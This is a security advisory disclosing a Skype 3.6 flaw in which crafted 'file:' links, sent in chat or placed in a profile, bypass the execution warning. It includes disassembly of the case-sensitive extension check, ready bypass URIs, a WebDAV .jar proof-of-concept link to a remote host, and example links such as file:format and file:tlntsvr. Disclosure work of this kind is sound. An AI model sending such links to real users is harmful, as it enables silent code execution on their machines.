Skype File URI Security Bypass Code Execution Vulnerability I - BACKGROUND Skype is a VoIP application for making phone calls and chat over the Internet. II - DESCRIPTION Two vulnerabilities have been identified in Skype, which could be exploited by attackers to bypass security restrictions and execute files without any warning message. User interaction is required to exploit these vulnerabilities. 1) - If a "file:" link is sent to the target, once the link is clicked, Skype alerts the user about the danger of execution of unknown files. However a remote attacker could create a specially-crafted "file:" URL to bypass this security warning and execute the file without any warning message. There is a limitation to exploit this vulnerability. The need to use a netbios name to bypass the dialog box that warns the user about digital code signing restricts exploitation to a local network in the majority of cases. 2) - Skype doesn't check "file:" link to verify if it's an url with a jar extension (java executable). Once the user click on the link, the jar file will be executed in the system, without any Skype or Windows warning. This vulnerability could be used to remote code execution if the attacker send a link pointing to file in a webdav server. Windows will use two methods to retrive the files: a ) As a shared folder - The link will be treated as a shared folder, trying to connect with netbios b ) Webdav Client - Windows Explorer is able to browse a WebDAV server as a network place. If the first method fails, the integrated webdav client will be used allowing to download and execute the file from a remote webdav server. EJ: file:\\webdavserver\dav\file.jar POC: file:\\www.inkatel.com\MyDav\myjar.jar - This example will execute calc.exe III - DISCLOSURE TIMELINE IV - AFFECTED PRODUCTS Skype 3.6.0.248 (Previous versions are affected too) V - ADVANCED DESCRIPTION When a "file:" URL is sent to a chat conversation, Skype allows the user to click on it. Skype does some checks in the link to verify if it's an url (to launch a web navigator), a mailto link (to launch the email client) and verify if the link has some dangerous extension: .ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl, .crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js to warn the user about the danger of execution unknown files. However this security restriction is easy to bypass with two methods: A) if the extension is uppercase, skype executes the file (the comparison isn't ignore case): file:\\computername\file.EXE CODE:00E430A8 ; =============== S U B R O U T I N E ======================================= CODE:00E430A8 CODE:00E430A8 ; Attributes: bp-based frame CODE:00E430A8 CODE:00E430A8 CompareExtension proc near ; CODE XREF: CODE:00CF35CCp CODE:00E430A8 ; sub_E26F74+6A3p CODE:00E430A8 CODE:00E430A8 var_14 = dword ptr -14h CODE:00E430A8 var_10 = dword ptr -10h CODE:00E430A8 var_C = dword ptr -0Ch CODE:00E430A8 var_8 = dword ptr -8 CODE:00E430A8 var_4 = dword ptr -4 [....] In the following function a search in the string is made, looking for 0x2E (.) to retrive the extension: CODE:00E430DB loc_E430DB: ; CODE XREF: CompareExtension+5Bj CODE:00E430DB mov eax, [ebp+var_4] CODE:00E430DE cmp word ptr [eax+ebx*2-2], '.' ; Look for "." to find extension CODE:00E430E4 jnz short loc_E43100 CODE:00E430E6 lea eax, [ebp+var_8] CODE:00E430E9 push eax CODE:00E430EA mov eax, [ebp+var_4] CODE:00E430ED call sub_405E80 CODE:00E430F2 mov ecx, eax CODE:00E430F4 mov edx, ebx CODE:00E430F6 mov eax, [ebp+var_4] CODE:00E430F9 call sub_406020 CODE:00E430FE jmp short loc_E43105 CODE:00E43100 ; --------------------------------------------------------------------------- CODE:00E43100 CODE:00E43100 loc_E43100: ; CODE XREF: CompareExtension+3Cj CODE:00E43100 dec ebx CODE:00E43101 test ebx, ebx CODE:00E43103 jg short loc_E430DB Once the extension in finded, it'll be compared with the list of dangerous extension. However this comparison isn't ignore case: CODE:00E4310A mov esi, offset unk_E781D4 ; List of dangerous extensions ".ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl, .crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js" CODE:00E4310F Compare_ext: ; CODE XREF: CompareExtension+86j CODE:00E4310F lea eax, [ebp+var_C] CODE:00E43112 mov edx, esi CODE:00E43114 call sub_405DB4 CODE:00E43119 mov edx, [ebp+var_C] ; Dangerous extension (.ade, .adp, ...) CODE:00E43119 ; CODE:00E4311C mov eax, [ebp+var_8] ; Extension to verify CODE:00E4311F call sub_405F9C ; This function compare our extension CODE:00E4311F ; with one of the dangerous extension (This comparison isn't ignore case) CODE:00E43124 jnz short loc_E4312A CODE:00E43126 mov bl, 1 CODE:00E43128 jmp short loc_E4316B CODE:00E4312A ; --------------------------------------------------------------------------- CODE:00E4312A CODE:00E4312A loc_E4312A: ; CODE XREF: CompareExtension+7Cj CODE:00E4312A add esi, 5 CODE:00E4312D dec ebx CODE:00E4312E jnz short Compare_ext B) if a "file:" URL is sent without the executable extension or with a backslash at the end, Skype executes this file without any warning: file:\\computername\file file:\\computername\file\ Skype uses ShellExecute to launch this application: CODE:0049BEE8 ; int __thiscall sub_49BEE8(LPCWSTR lpFile,INT nShowCmd,LPCWSTR lpDirectory,LPCWSTR lpParameters) CODE:0049BEE8 sub_49BEE8 proc near ; CODE XREF: sub_E287C4+6Dp CODE:0049BEE8 ; sub_E28874+150p ... CODE:0049BEE8 CODE:0049BEE8 var_14 = dword ptr -14h CODE:0049BEE8 var_10 = dword ptr -10h CODE:0049BEE8 var_C = dword ptr -0Ch CODE:0049BEE8 var_8 = dword ptr -8 CODE:0049BEE8 var_4 = dword ptr -4 CODE:0049BEE8 nShowCmd = dword ptr 8 CODE:0049BEE8 lpDirectory = dword ptr 0Ch CODE:0049BEE8 lpParameters = dword ptr 10h [...] CODE:0049BF16 mov eax, [ebp+nShowCmd] CODE:0049BF19 push eax ; nShowCmd CODE:0049BF1A mov eax, [ebp+lpDirectory] CODE:0049BF1D push eax ; lpDirectory CODE:0049BF1E mov eax, [ebp+lpParameters] CODE:0049BF21 push eax ; lpParameters CODE:0049BF22 push edi ; lpFile CODE:0049BF23 lea eax, [ebp+var_4] CODE:0049BF26 mov edx, esi CODE:0049BF28 call sub_405D78 CODE:0049BF2D mov eax, [ebp+var_4] CODE:0049BF30 call sub_49B524 CODE:0049BF35 push eax ; lpOperation CODE:0049BF36 push ebx ; hwnd CODE:0049BF37 call ShellExecuteW ; Process file: URL This vulnerability could be more dangerous in a Local Intranet, because this zone is trusted, by default, for Internet Explorer: "Launching applications and unsafe file" is set to "Enable" So an attacker could share a folder in his computer and put an executable in this folder, for example file.exe, and send one of these commands to the target: file:\\computername\file file:\\computername\file\ file:\\computername\file.EXE NOTE: computername shouldn't be an IP address. If you use an IP address as computername, windows will show a warning dialog box that warns the user about digital code signing. If you use netbios name this warning won't appear. Once the link is clicked, the file will be executed without any warning. The second example is more dangerous, because it seems a directory but in fact the file (file.exe) will be executed. The same vulnerability could be triggered with "About Me" profile data. An attacker could set this profile record with the specially-crafted "file:" URL to bypass this Security warning. VI - POC's 1) More examples: file:cmd file:calc file:format file:tlntsvr 2) file:\\www.inkatel.com\MyDav\myjar.jar -> Execute calc.exe VII - CREDIT Bug found by Ismael Briones [http://www.inkatel.com]